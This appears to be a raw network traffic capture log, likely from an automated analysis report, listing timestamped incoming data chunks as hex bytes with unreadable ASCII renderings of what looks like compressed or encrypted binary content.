                                                                                                                                                            2022-09-29 12:45:15 UTC20837INData Raw: 4f da 9c 43 38 c6 32 13 85 c0 08 09 ee 6f 55 d9 e2 bb 15 48 95 30 bd d5 b9 1e 52 b0 1a d8 24 50 54 09 2a f5 20 66 b7 17 af 42 51 ea f2 f6 8c 33 4b 02 bf e3 55 50 72 c7 bf ed 33 36 3a de 1e df 9a ee 34 b7 5f 5d 47 a6 3a 14 4e 97 e9 0b 17 2c 76 cf 15 10 c4 ac e0 e8 59 f6 6c cf 4e d6 e2 7e 19 54 e2 26 1a 49 4f f8 fe f2 a4 9f ca 60 bb d8 10 f0 02 5f 02 ae 0f 4e 3a 2f 15 df e0 b2 9b 7a 21 11 09 b4 14 3e 95 3d f4 8f 78 64 c5 52 e4 67 24 eb 81 a8 37 2c a2 81 6e a5 14 ba 68 05 aa 45 47 be af 40 56 38 0c 8f bc 24 db af bc 07 8d d2 2c 58 29 59 06 f0 6c 1d 86 3f 78 36 0a 75 35 ff 14 aa d3 a2 63 ce d6 08 ce 2e 7a 57 a6 8c 8a b3 be 50 cd 1f dc 8c da 4a 3f a6 3e 06 f7 ed f8 25 e1 52 e8 d4 bc f3 cb 30 09 e8 a1 df d1 b0 19 42 7e ba cc a2 29 59 d8 7e 6d 24 6b 40 70 f3 6c
                                                                                                                                                            Data Ascii: OC82oUH0R$PT* fBQ3KUPr36:4_]G:N,vYlN~T&IO`_N:/z!>=xdRg$7,nhEG@V8$,X)Yl?x6u5c.zWPJ?>%R0B~)Y~m$k@pl
                                                                                                                                                            2022-09-29 12:45:15 UTC20853INData Raw: 03 78 1c 50 8a 1d 75 8a 0b 20 d6 ea 2b 16 b2 a7 9d 58 47 49 43 53 8b a9 43 18 ef 1b 35 da 0f d0 68 ae 98 d0 d5 36 1d 79 fc aa 3b d5 83 5b 42 64 fc 78 71 52 33 4a 8f 3c b8 a8 41 4c e8 44 1c 86 2e e3 ed d9 ff 20 83 50 78 9e 68 df 5b da 47 18 ca 7b 68 bb c2 02 96 00 6c 98 3c fa b6 de 00 78 b2 8c 4f ed 8f 1f 37 ec b7 43 75 e4 f2 0c e9 05 20 a6 3a c3 b7 c3 e7 6a 67 16 42 d8 7c 03 9c 1e 92 74 1b 72 9d 6c d9 7a 55 d7 bf 4d f9 fa e5 e5 f9 aa f1 c7 4c f2 eb 95 d3 16 e3 cc f8 2a d4 68 80 fb ad 0d f8 06 6d 56 2a ad e2 bf d6 a6 ca 17 6c 4c ce 73 bd 50 c8 4d 46 0d 5f 35 9e a4 ec d7 b7 13 fa 91 08 ab 84 22 51 d1 4f dc aa e1 00 2d 78 37 8f e6 44 fc e5 a6 5e 5a 97 61 32 ef e5 c7 16 3e e7 9a 2c 39 a2 0c 7e 7f 2d f8 54 91 bc 92 50 b8 7d b0 10 34 7d bc 0c 2d 15 86 e8 f0 48
                                                                                                                                                            Data Ascii: xPu +XGICSC5h6y;[BdxqR3J<ALD. Pxh[G{hl<xO7Cu :jgB|trlzUML*hmV*lLsPMF_5"QO-x7D^Za2>,9~-TP}4}-H
                                                                                                                                                            2022-09-29 12:45:15 UTC20869INData Raw: 94 58 9b e4 82 74 b1 c1 99 69 8a 99 48 b3 14 dd 91 f4 fb 4d a6 50 fd cc 1a 4c ba 0d 2d 6c 68 84 0e ac 23 d6 ea b1 20 1a d9 06 a2 c9 ea 91 0f 72 dd 78 67 d6 e7 d9 12 6e 1b 0f 47 8c 1d 80 1a 2c 5a df 4e cd 6c f7 f8 ed 66 7e d5 98 62 c5 ae 24 d2 2c 7b 4a 0e 0e ef a4 69 4c 8a 12 f6 a2 54 fe 74 c8 71 b4 b4 34 32 5a 05 41 53 22 93 59 de 97 43 44 d5 6c 16 9b 2f 7f 6a bb 8c 93 f2 83 a9 7a 7b 1e dd 03 2e 0b 24 6e 10 6a 56 78 62 88 d0 ba f7 c9 c6 16 11 49 d8 46 2b 36 be 24 a0 a8 e0 d0 b5 af 58 02 f0 22 72 9d ee ee fa cc 2d a2 6b 5c bc aa 2d d6 b7 5b da cc b8 4a 07 56 28 94 79 cd a5 1d dc 8d c0 57 87 7d c0 82 e1 9c ce 5c 2a f6 be fe e3 bd 89 ee 4a 48 71 55 f1 91 b4 32 04 4c 99 a7 26 3c 7a b8 97 e7 17 5b a1 a7 ad 72 52 da 78 8d c0 9e 45 ac d2 16 32 d2 ee fa 43 f7 81
                                                                                                                                                            Data Ascii: XtiHMPL-lh# rxgnG,ZNlf~b$,{JiLTtq42ZAS"YCDl/jz{.$njVxbIF+6$X"r-k\-[JV(yW}\*JHqU2L&<z[rRxE2C
                                                                                                                                                            2022-09-29 12:45:15 UTC20885INData Raw: d8 13 a3 40 de 06 93 20 68 89 e4 86 54 16 c3 88 0e 3a b3 88 28 be f5 07 71 da f6 76 3f c8 a6 41 aa 5e e3 fd 0e 7c 96 9f 30 e6 e9 c9 22 19 e4 55 91 a2 98 6d 3c 2a 4c 06 e1 17 6d 24 ad d9 e9 3e 9f 00 ed 7b c8 00 4d ea 25 f6 fa 68 b2 de b2 1f d5 3b db c3 fb aa 0e c5 eb d6 05 0b 4f a3 ea f9 67 ea b9 0a f6 23 aa b8 3e 9c 0c 31 83 00 3c 10 e7 2c e7 84 4c 67 0a 04 68 4a cb 9f 27 0a 14 34 8d ca ff fc 71 70 d4 d2 06 7e df f1 c5 d1 42 68 44 77 4a 38 6b f7 03 82 6c 7e 9c b1 21 8b dc ed e6 8d a7 8d 21 5b 2a 17 c6 bb 12 89 c6 52 b3 16 01 5e 9c 3e 75 ff aa 8b ee f0 a5 4d 1e e2 6c fa 67 b8 90 17 98 ce b1 31 60 3f 9f a2 db 8c 3c 5c 42 8f 76 9e 57 60 51 a4 a1 91 80 e2 cc 20 15 b0 15 0b 5d c8 97 f9 19 c8 2e 4d 11 01 a6 a9 19 0b fb 55 3e 66 fc f7 03 73 ad 3a 2e 05 98 13 46
                                                                                                                                                            Data Ascii: @ hT:(qv?A^|0"Um<*Lm$>{M%h;Og#>1<,LghJ'4qp~BhDwJ8kl~!![*R^>uMlg1`?<\BvW`Q ].MU>fs:.F
                                                                                                                                                            2022-09-29 12:45:15 UTC20901INData Raw: e4 94 37 bd fc 81 28 7d 5c e0 50 3e e2 5c cc 8d cc f2 1e 77 a5 a1 79 f6 4e bc c1 2d 92 20 10 e1 55 b2 35 aa de ca fd 99 63 76 ff 9d 03 74 1f f2 2b f6 2f 91 c4 f3 75 64 3f 03 26 1f 25 86 56 71 ef e2 93 f7 32 a0 bd ad 47 71 57 b4 ff 6a 33 f4 23 95 ae 0c a6 c5 4a 59 ec e2 17 9c d7 05 7e d0 47 31 b5 8f 06 2a e9 cb 10 7c 7c 22 e6 b9 e4 1d c7 6a 53 80 0a b7 1b 27 9d ba 7d 08 30 f1 b1 f2 39 c6 5d 17 9e 3f 26 6b 55 31 a7 b3 bc 9f 0e df d3 94 f2 bd 96 ed 66 21 62 03 8d b2 a0 93 e4 28 47 10 32 01 40 af f4 69 cc fe 26 80 7e 51 63 c9 08 5e 53 27 62 7e 97 3a 69 5c 7f 8c 90 8e ed b7 d6 97 98 f7 38 d6 62 e9 c9 2e 14 ec 6e 3e 3a 30 42 b9 f5 9a ae 07 ac 60 ef 4c 59 12 31 80 70 56 5f 86 08 7c 78 23 68 4b ba c2 d1 10 fc 27 75 91 73 56 86 8a 09 26 33 96 2e e5 6a c3 70 a6 15
                                                                                                                                                            Data Ascii: 7(}\P>\wyN- U5cvt+/ud?&%Vq2GqWj3#JY~G1*||"jS'}09]?&kU1f!b(G2@i&~Qc^S'b~:i\8b.n>:0B`LY1pV_|x#hK'usV&3.jp
                                                                                                                                                            2022-09-29 12:45:15 UTC20917INData Raw: 12 c1 b5 3d ec cf a6 45 72 f3 06 42 18 3e 7c b2 80 17 a3 fa ed 31 eb 9b 0a b1 3b c1 b4 92 d8 e4 bc 18 d0 df 49 6a ce 1f aa b6 52 bf 0e 04 57 24 9f d1 bb cb 20 db 9b 7f 56 7c 83 dc c6 ae cd 0b 65 c4 09 a8 ca 3a 6e df 13 bc 0d 34 ed ed 0c a1 04 ab de eb d6 50 ad a1 97 2f ff cc b0 1c 98 56 65 9e 09 f6 df d4 90 75 d0 7a 31 5e e1 4a d6 02 72 36 10 a0 d1 09 0e 72 36 13 38 6d 7c 01 39 b6 94 a5 0c 7e dc fe 12 ba 9a a5 a1 df b4 2f 17 01 3b 50 c0 d0 7b 25 6d f4 66 6a 00 8d 6d 78 c0 c8 02 89 22 33 5e c0 db a5 5a 94 a2 15 d7 82 2e 07 a9 b5 00 ef 78 de b3 c9 56 37 b0 22 06 41 13 2e de b4 d6 87 9c f6 fe 6b 51 ca 8f a3 73 7e 12 04 5e 03 ec 3f 74 77 13 c8 37 31 e9 48 f5 1f d7 02 c4 24 18 0b 93 68 8a 7f 0d 87 66 c4 0f 41 f9 9d ac 26 45 2e 4d 23 2f c1 92 9e 3e dc 92 78 e4
                                                                                                                                                            Data Ascii: =ErB>|1;IjRW$ V|e:n4P/Veuz1^Jr6r68m|9~/;P{%mfjmx"3^Z.xV7"A.kQs~^?tw71H$hfA&E.M#/>x
                                                                                                                                                            2022-09-29 12:45:15 UTC20933INData Raw: 22 49 a4 87 bc e0 8e ad bb ee 68 71 96 08 fc 99 dd 16 47 20 85 ec ea 8d af a2 ce 66 55 99 c0 37 87 92 ca ad bb b8 56 a8 45 05 5a 07 bc e8 78 88 a3 dc 60 bc c8 4f 80 18 e7 b9 df e8 cd ce 6e 2a 75 c9 c8 36 b6 ef 7e f5 4c 01 2f c1 d1 86 d4 58 63 08 47 52 3f 80 ea 20 47 cc 0d b9 9d ee 7e f6 87 3b 20 28 eb ed 1b b2 20 53 75 f9 3b 18 93 62 68 35 55 48 de fe b9 fb 55 3b c1 5d 67 7b 97 bd da 1a f0 ab db 97 54 50 b2 27 5d ce 9f 38 b3 a3 2e af ff bc a0 6a f2 da 7e 60 d0 b8 d0 18 f8 4b 70 9f 04 7a fe 57 f3 84 cd fc a6 34 4c ae a5 c7 56 e5 c9 d1 44 1a d6 15 ec 5f e0 f3 60 c6 d2 fc 49 4a ce 6e d4 2f f5 1d 0d 8f 6d b3 41 26 77 5b 99 7d fd 07 4d 0d 5f 4a 3f 0b ac 8d bc d4 fd ee 81 b6 5f ba 54 a1 6c 02 d0 3c 60 91 04 51 6c 3b 05 15 cd 73 d1 f3 b8 11 c3 c9 da 43 26 f9 91
                                                                                                                                                            Data Ascii: "IhqG fU7VEZx`On*u6~L/XcGR? G~; ( Su;bh5UHU;]g{TP']8.j~`KpzW4LVD_`IJn/mA&w[}M_J?_Tl<`Ql;sC&
                                                                                                                                                            2022-09-29 12:45:15 UTC20949INData Raw: 5e 6b cd 23 eb e9 a2 6b b6 e6 1b bc 1e 88 23 b5 7b 9b 83 c3 f9 f5 2a f2 dc b3 c5 6d ce 9d 97 78 f1 ae a4 8e fe 97 7c 64 70 6d 00 96 ea 0d d0 8d 44 3c 46 4e a8 04 14 06 cd a8 7a 4f 89 69 ea 9a 5f e6 54 54 89 a6 6f 15 ba 58 cc 32 60 51 11 8c 6e 17 f6 34 95 6d 93 de 5d f0 7e d3 84 d9 ff c5 16 63 b8 ff fa 35 b5 f7 31 f2 f2 e4 2a 0b ff 25 09 9b 72 e6 68 a9 43 83 44 0e 5d 9e 6c d9 e2 ae da 07 bf 39 1a e5 da af a9 ab b7 34 83 b8 af cd ef db 64 59 d2 df cc 69 86 4e 91 04 ff d7 75 6c 51 1e b8 b0 b9 4d 15 83 60 28 ce 34 cc 16 ed 61 79 aa fc 32 b3 ea b6 90 bd 7e ec 20 4d c4 dc 0f e1 a9 5b 60 52 70 0f f2 ca 80 6d 78 f5 f2 9a c3 b9 08 3a ac bd 01 3c b0 b5 77 c0 36 4d 4f 3f 64 1d c7 14 2d 7a 37 d6 cf fe 3b 89 d3 4f e5 38 11 56 4d 6d 03 0c 74 d1 97 47 33 68 f5 0d 1f d3
                                                                                                                                                            Data Ascii: ^k#k#{*mx|dpmD<FNzOi_TToX2`Qn4m]~c51*%rhCD]l94dYiNulQM`(4ay2~ M[`Rpmx:<w6MO?d-z7;O8VMmtG3h
                                                                                                                                                            2022-09-29 12:45:15 UTC20965INData Raw: f0 c5 2a e9 3b ff 03 4d e1 c2 4f 38 78 dd bf b5 a2 be d7 43 59 bc 0b b2 fb 08 0e 79 da a7 ff 93 b8 33 c9 ab d3 e5 33 39 1c a2 05 d9 1c 26 df 76 9b c2 f0 9e 95 de 10 00 77 83 1e b1 66 64 a4 43 b9 d5 d6 d4 4b 95 b6 89 80 05 79 dc 55 e2 db eb 72 80 f2 e0 7a e5 c1 cb d2 24 2b 36 ab 95 32 ba 09 0a 34 c6 78 96 69 88 8d 61 d4 6a 43 e5 94 45 e5 29 42 28 6a bd 5f 04 77 0c d3 e0 56 f7 79 38 e8 c2 cc 35 7b 58 d4 ff ed 35 c1 73 43 5b f1 42 40 73 7b 6d 0b e6 8d cb 45 cb 03 32 a4 fa 4e c8 7b f3 8d 52 bd d3 f9 f2 e0 63 70 f9 ec 20 9b 31 af 3d 32 12 a6 9b ff 2c fa b1 43 10 85 f7 65 24 01 bd 7f 40 85 3d 5b 9c 50 e3 be 4c 41 0d 11 4a 9b c1 b2 27 cb fd 93 4c 76 91 7d 05 b3 f9 9e 94 4c f9 22 1a fc 2b da 04 a9 59 c4 41 12 a1 9b bb 21 9c b0 3f a5 a3 24 e6 b7 30 1d 6d 81 ba 3e
                                                                                                                                                            Data Ascii: *;MO8xCYy339&vwfdCKyUrz$+624xiajCE)B(j_wVy85{X5sC[B@s{mE2N{Rcp 1=2,Ce$@=[PLAJ'Lv}L"+YA!?$0m>
                                                                                                                                                            2022-09-29 12:45:15 UTC20981INData Raw: 0d 82 2a 77 bf e3 ac 3e 25 ba 33 0a 8e b0 34 ed 9d d3 b3 2e 37 2c 13 7f 1b 9f 66 e1 bc ad 1f c6 57 23 a5 9a ad 93 32 b4 de 07 1b e2 0e 16 ad 06 d5 02 dc e5 f8 4b 2c 6c 2d 51 79 e6 16 37 cc 1b ed ac 14 d1 d6 ea b0 1b 33 cb 3b 70 f2 0b 96 bb 86 1e c5 c9 13 7d 21 89 cd 90 39 f7 f8 21 9d 1f 98 08 9e 6f de da 9d 51 39 cc b2 29 f2 96 e6 aa 7c d3 ed 73 b3 eb af 1c e6 c2 7b f1 c8 47 ea 3c e6 1a 48 13 a6 7e 5b 84 80 95 7d cc c0 e4 8e 43 9e 6a 8b 0d 4a cd 2a 44 77 5c 63 6c 7a b6 30 5d 6b 4b 4c 56 b3 41 e3 74 03 70 a1 ae 93 69 b6 de fe d6 2a 27 40 4f cc bf 28 31 ca 58 e4 ee fc ea b0 9e 2d 4e 89 45 b3 90 9a 25 0c 4b 78 d9 95 d5 2f d6 a3 5b c9 68 5c e0 a4 52 44 9c 2d 82 81 e5 f2 c1 fe 96 f2 ed d6 e7 e8 06 15 cd a1 79 8b 77 d4 f3 e6 a5 23 f1 4c f7 2d b0 dd e6 38 0d ef
                                                                                                                                                            Data Ascii: *w>%34.7,fW#2K,l-Qy73;p}!9!oQ9)|s{G<H~[}CjJ*Dw\clz0]kKLVAtpi*'@O(1X-NE%Kx/[h\RD-yw#L-8
                                                                                                                                                            2022-09-29 12:45:15 UTC20997INData Raw: 73 a1 f0 97 23 15 50 d7 32 00 df 6b 80 5d e4 f2 97 68 e5 92 85 ad 00 49 c1 46 d9 39 52 4f a2 49 15 2d 72 ae 20 85 ab 32 41 49 c6 ac 2e af 73 a6 35 b2 45 47 76 2a f9 c4 d6 92 7c 48 99 5e c7 0d 31 a6 19 d8 bd 2f 26 da 30 4d 7d 46 41 b7 12 20 0a 3f bf 09 2b f8 27 10 d6 82 98 4b 79 4d 93 c9 89 ff 48 0f 64 1b e5 57 f9 d7 c4 60 ee 66 eb 7d 28 28 d9 f0 ca 77 b4 18 34 23 23 a5 95 5e 41 c9 3f c3 b0 82 3c fa 23 d1 9c a0 40 e4 06 fb e6 c2 46 37 d2 1e 27 6f c7 6f 3b 17 10 46 9c 26 35 1a b6 03 f2 6c 87 ab 0a 92 5a 32 2e b9 4f c9 d3 87 8a ac 59 6c db eb 7e ae b9 32 c7 5f 93 85 6e 90 5f 6c f5 b9 8a 7d 2d ac c1 bb e1 0d a0 22 b2 12 04 07 13 44 8e fd ca c3 7e 6e 00 27 4a 65 98 32 ec de 9a aa 30 4b 9b d4 c5 80 34 6e 07 4f 30 9d 64 0c b0 cd 46 fe e2 1a da 82 f2 77 6a 53 ec
                                                                                                                                                            Data Ascii: s#P2k]hIF9ROI-r 2AI.s5EGv*|H^1/&0M}FA ?+'KyMHdW`f}((w4##^A?<#@F7'oo;F&5lZ2.OYl~2_n_l}-"D~n'Je20K4nO0dFwjS
                                                                                                                                                            2022-09-29 12:45:15 UTC21013INData Raw: f6 83 dd b7 fd ac 17 83 fe a6 91 5e 0b 0c 56 65 22 6e 0d bd f1 e0 2a 58 7c 0a 27 5b 00 51 41 49 9d c3 5d 16 01 3e 31 15 d6 8b e3 3e e5 96 3b 8c 94 37 db 65 9f ba e6 f4 1d 2b 9e 05 d6 9f e8 09 96 20 83 de cb 30 ef 38 d6 49 4f 12 e8 20 41 da 82 03 25 73 4d fc 4a 65 4f b4 25 f3 3d aa d4 f9 22 08 8c 9c 30 28 d2 15 4f 83 9d f9 cd 6a 0c ba d6 82 cc 90 b4 74 7b 6d 81 c4 f5 d6 77 35 6a 4c 56 33 70 ff 69 dc cd 9c c8 cb e8 f4 80 c7 aa e5 29 8c 5f c7 d6 d3 84 95 80 55 ea 57 c6 b2 4d 72 0c 43 3d 88 ae 14 cb 18 6b 7f 0e 02 3a 87 dd b3 16 2d 31 1d 1c 80 0d f7 b5 08 16 0e b7 a5 fe 6a 53 c2 f5 3d dd 9e 11 cb 8b 74 04 68 aa 0b 04 4f fa b1 47 d3 69 33 32 45 ea c8 f2 0b 59 a6 f1 fe 7b 57 93 2d 2c 2a af 03 7c 36 8b 46 69 cc 4e 05 41 c4 1f 52 d8 8c aa a7 0e 94 c8 75 5c 73 65
                                                                                                                                                            Data Ascii: ^Ve"n*X|'[QAI]>1>;7e+ 08IO A%sMJeO%="0(Ojt{mw5jLV3pi)_UWMrC=k:-1jS=thOGi32EY{W-,*|6FiNARu\se
                                                                                                                                                            2022-09-29 12:45:15 UTC21029INData Raw: 93 df 61 12 9e 6f 8e c9 25 66 91 e5 98 d3 71 b9 d8 9c 53 bb 5a f7 18 94 01 e1 b1 08 32 b9 7d cb 57 16 ca 81 3a 93 05 3a 24 f9 ef 06 9e f9 f7 a0 b1 a2 2a 21 9e e6 08 27 99 04 d3 fe a4 93 ce e2 77 4c d4 2c f0 13 ab ca dd 57 66 54 c1 e3 ea a5 4e 43 4d 92 27 84 74 2d cf b3 45 c5 85 b7 f3 02 78 c6 c3 b1 84 9e 14 4b cc b9 61 b2 d7 80 d7 83 5d ba e6 a6 ed 82 51 f8 f6 9e 5c 3d 88 65 6b 02 e9 98 cd 19 ad ba 20 57 23 04 49 a6 46 a7 31 2d e7 b2 d2 e1 3d ce 9c 4a 4e d0 6f c0 45 16 9d 85 a5 7c 45 e0 d4 04 87 79 53 62 89 c5 b4 33 2b a2 a4 5b 34 88 93 ed 5f 96 bf 30 1b 73 67 69 e3 c1 f6 06 a8 60 63 56 d1 d6 2d 47 54 35 9e 5c fc 68 96 fb 25 b9 bb 4f c0 56 e2 a8 94 60 7b de 05 e9 98 a6 97 da 24 0f 15 38 24 13 62 1e af c1 7d 66 2b 2c 98 4a a9 be ae 0f 07 60 92 58 6f 34 7d
                                                                                                                                                            Data Ascii: ao%fqSZ2}W::$*!'wL,WfTNCM't-ExKa]Q\=ek W#IF1-=JNoE|EySb3+[4_0sgi`cV-GT5\h%OV`{$8$b}f+,J`Xo4}
                                                                                                                                                            2022-09-29 12:45:15 UTC21045INData Raw: 53 68 d5 26 14 00 af a0 a6 ed 0f d1 4b 67 d1 34 f3 03 cc 63 00 0f 32 47 ec 6b 7c df ce 4d 23 ff 20 86 9c 48 2d 34 38 81 6b 30 93 6d bb 0e 61 eb a1 e0 24 37 88 c3 bd 3c da 77 fb f1 e2 6f 6c 31 47 e0 e1 d2 26 4c 15 42 48 51 64 14 3f b7 c3 83 ab 28 0f 6f b1 5a 59 6f db a4 e0 56 5e f6 b9 e7 06 e4 9a dc 7e cd 4f 3f 05 26 f2 8e 63 6a 39 f1 5f c7 cb 1d 37 5e ab 7a 5b 08 b5 2b 25 39 1a f2 44 ce 77 b5 a6 f8 22 a2 b0 bd ac 32 b4 4e 3c 73 3c 08 8a c5 93 9f aa 1d 20 7a b4 14 74 ce 35 53 d4 93 d2 c6 c7 cf bd ce 72 c3 9b d7 a2 22 d0 cd 46 57 12 a8 52 ba 9b cc 87 f0 79 05 51 9c f6 8c 56 29 61 d5 99 b7 68 fa bb bd 97 2f 3f 7b a7 73 1e 13 06 fe b1 7d 3a 13 e8 41 b8 73 42 00 c2 0c 73 58 78 37 99 20 54 d1 1f 9f 3d 12 9d ae 8b a9 a0 7c 3b e9 2a d4 76 ad 68 08 57 49 21 8a a4
                                                                                                                                                            Data Ascii: Sh&Kg4c2Gk|M# H-48k0ma$7<wol1G&LBHQd?(oZYoV^~O?&cj9_7^z[+%9Dw"2N<s< zt5Sr"FWRyQV)ah/?{s}:AsBsXx7 T=|;*vhWI!
                                                                                                                                                            2022-09-29 12:45:15 UTC21061INData Raw: 4b 56 5e a1 3e 54 18 6e 86 7e 0e 0c aa db 6d 18 1f bd 4b d2 28 fd e2 93 8f df 7a a3 13 9f 28 b0 2c 32 97 93 9b 46 40 d9 d1 cf b0 26 d1 8c b7 ef 5b 36 4b c9 27 39 80 dd 44 d4 88 71 28 a9 52 dc 0e a2 14 30 26 bb 47 e8 57 b7 42 df 95 db 70 83 83 64 f4 83 e2 a8 d5 6b f7 3d 7f 80 74 70 34 f1 97 c9 cb 34 20 eb f8 ad 9d 8f 0a 1d 0a f0 ec 40 8a d9 90 6f a4 c0 a3 ac d9 f7 6d 85 ec 64 73 9a 58 c2 9c de a3 7c ba 9f 93 1e e7 2d 48 8c bc be 0d a9 09 ea 01 86 2e 1f 72 92 e9 ae 61 f9 7e 3c 3d c8 11 13 b2 af 95 94 a2 29 d0 b1 77 da d4 7f 8b af 99 e7 1c de 91 e3 92 37 a7 b8 1b 1d d8 d4 95 a3 49 5c 89 34 fc 6c 64 66 3a ee d8 73 4b 02 57 b8 c2 6e 8b b0 22 92 0e ff a7 ab 11 ed b4 b6 86 79 43 eb 79 db b4 51 51 c5 1c 07 b3 64 a7 eb 4b e0 17 28 63 fc 71 bf 44 2d b7 ca 24 09 50
                                                                                                                                                            Data Ascii: KV^>Tn~mK(z(,2F@&[6K'9Dq(R0&GWBpdk=tp44 @omdsX|-H.ra~<=)w7I\4ldf:sKWn"yCyQQdK(cqD-$P
                                                                                                                                                            2022-09-29 12:45:15 UTC21077INData Raw: af 4e 15 56 e8 70 68 6a 8e 46 6f f0 ef 10 62 1b 85 b2 e5 5a ba f3 54 f8 2a a3 d5 6b 35 02 60 a8 95 4c 1d 82 e5 82 5c b3 f8 37 c2 cb ef 9e 9e 76 25 69 bf 3e ab 63 d6 7f 59 74 f9 5b 6b d7 b2 c9 e6 a5 2c d8 de 79 42 90 06 6c 7d bd ae 0b 24 bb 41 0a b7 8b 35 55 bd 25 99 0f bb 78 e6 d5 6b 46 da d7 ca cb 0b 30 9d 7a 63 29 ca 5d e3 f8 2b 92 2b 3c 8a 76 ea 06 2b 49 95 3a 9f a0 f2 6f fa 87 f7 92 ef aa e5 59 43 f9 4e fa a1 c3 9e dd 14 de 10 c4 9d 69 fb 58 d1 16 82 ef 3c d8 d4 77 f2 cc 6b 3d ab 44 1c b2 b0 5e f9 a4 6d a4 4a f7 9c 87 de 65 bc 1a 96 3b be 61 72 10 91 c1 e6 fd a6 4a 51 52 7c 49 ee 69 d1 39 3f b5 5a 9c a0 b5 4e ba 77 ed b1 a4 bc 53 50 7f d5 e8 16 76 c3 46 39 74 4b 91 26 d8 96 a1 4c f9 c0 4e 86 a2 78 e0 a7 9e ba c2 40 4e 3c c9 68 6d 37 42 27 40 ec 78 79
                                                                                                                                                            Data Ascii: NVphjFobZT*k5`L\7v%i>cYt[k,yBl}$A5U%xkF0zc)]++<v+I:oYCNiX<wk=D^mJe;arJQR|Ii9?ZNwSPvF9tK&LNx@N<hm7B'@xy
                                                                                                                                                            2022-09-29 12:45:15 UTC21093INData Raw: 62 73 ce de d3 3c a0 bf 3d 97 6b 2d af 4f c2 e1 af 79 e9 93 0d 9b 8d 0d f2 31 a5 13 bb 2e 4d 46 cd f5 bc 66 2d a2 6e 34 4e 66 32 49 09 a0 11 dc 3b f8 de 57 5f 18 a4 81 d0 69 63 ff c5 e7 24 46 93 00 59 92 e1 88 e5 0c 99 eb 5b c9 53 64 5c 63 eb 84 9c c7 78 a7 fd 1a 1e ab 27 02 74 a2 ad 82 38 1f ec 1d dc c0 32 fe a4 ab bf 0b 48 44 61 b9 b8 c6 e4 36 79 7f 2b 30 0e b1 c3 12 fa 2b 69 e6 59 ad f3 30 1b 16 9a 59 b6 59 46 d2 ce 2f 75 3f 10 32 83 98 07 8e 1c 39 ba d7 b3 8e 45 76 c6 fe 85 cb 46 4e 54 12 24 29 00 42 8a b2 2e 0f a3 81 a8 34 0a 5f 66 ca 88 cf 8b c9 1c 42 22 d4 3c b9 c1 ff ed 99 b6 41 3f 38 94 57 1d 74 5c 4b 0a b8 66 c4 79 55 6c 37 b1 d1 ba 5a 65 2a 1a bd 2d 0b 80 c5 ad 1b 96 31 23 5b 9e e3 ba 00 a7 f0 81 80 09 d4 ab 84 22 9d fa b7 3e f0 22 b4 e8 90 fc
                                                                                                                                                            Data Ascii: bs<=k-Oy1.MFf-n4Nf2I;W_ic$FY[Sd\cx't82HDa6y+0+iY0YYF/u?29EvFNT$)B.4_fB"<A?8Wt\KfyUl7Ze*-1#[">"
                                                                                                                                                            2022-09-29 12:45:15 UTC21109INData Raw: d7 e3 25 fa ba f2 33 7d 87 79 a3 8f 07 cd b3 02 1f 98 0a f1 02 71 64 a0 1e 66 bc df 25 07 63 76 b4 85 6f d0 c6 90 81 e4 7c fc 55 65 aa 9d a3 5f 90 ac 3a ec 65 68 fd f3 c9 6a 59 4e a9 7c 70 1b 82 a2 29 1c 07 f4 9f fc db 6f 75 49 47 82 4c b8 9c 64 b7 ca 2f dc e6 33 59 d9 06 7c 55 dc a2 db 43 75 22 5f 14 97 fd db 80 8f 30 9e d1 f8 3b 3d d1 8c 95 30 bf 57 dc 6c 77 dc a1 b4 d3 51 c8 22 b0 36 3f 65 a2 7e 40 3c 79 fc 10 61 60 19 22 fa 3f 1e 95 61 f8 18 ff af 74 e6 1e 53 18 bb 57 1a 2a 76 dc 12 92 6f a8 5f e5 08 cf 61 4b 32 5a 11 4e d0 48 90 0b 60 4e 26 c4 7e 28 c2 5d 14 d1 1d 08 bd f1 ef 99 94 80 c9 2c af a1 5b 3b af d6 9a d2 ec ee c7 81 80 2c 86 4b 68 7a 84 98 db e2 ad 7e 96 63 85 9f 94 c9 39 1c 4a 93 b9 7a a1 50 54 4a 56 c7 28 af c2 64 55 8e b8 f5 aa 23 65 d7
                                                                                                                                                            Data Ascii: %3}yqdf%cvo|Ue_:ehjYN|p)ouIGLd/3Y|UCu"_0;=0WlwQ"6?e~@<ya`"?atSW*vo_aK2ZNH`N&~(],[;,Khz~c9JzPTJV(dU#e
                                                                                                                                                            2022-09-29 12:45:15 UTC21125INData Raw: 15 01 b0 58 fc 68 fe ab 11 63 c2 81 f3 72 08 67 4a d5 b3 9c 62 19 d5 6a 5b 9b c8 e8 a7 0b 81 f5 d5 e4 dc ca 4e c2 c8 f0 39 5a 53 d2 08 92 38 db dc 05 dd 73 d3 a0 25 5b 39 6c c3 2c 70 87 90 d7 98 f7 72 1d 9d 07 26 1a a7 3a 3b e0 40 24 1e 23 58 c3 7a 25 44 d0 82 dd 25 f8 c6 e5 72 34 c2 d3 7b 19 64 fb 4d ac e7 b1 2c 27 3a bb 2e a3 21 fb 4e e1 d7 6b b8 79 60 f8 d4 22 89 7d 6e 3c 19 c8 41 57 f8 4f ea 03 23 c2 ce 59 27 3e 40 50 56 42 98 d0 4b cd 95 55 7b 78 ba e0 32 43 06 c3 ac 6e f4 e3 2b b0 5f 47 a1 54 f8 15 89 5a 3f 7e f4 a8 88 59 85 d4 78 d5 48 f6 c2 e3 74 b4 53 bd f3 96 80 71 57 93 b2 5f b9 91 a9 77 b4 2f 31 cd 28 1c ec e7 09 f9 45 58 e4 d9 5a c7 3e 0c aa 3b 34 f2 ba cb 18 88 fe d7 e9 45 ba 67 9a 28 eb 2e 31 64 97 18 ba 75 1b 9b c5 f2 e7 47 66 0c f7 47 0b
                                                                                                                                                            Data Ascii: XhcrgJbj[N9ZS8s%[9l,pr&:;@$#Xz%D%r4{dM,':.!Nky`"}n<AWO#Y'>@PVBKU{x2Cn+_GTZ?~YxHtSqW_w/1(EXZ>;4Eg(.1duGfG
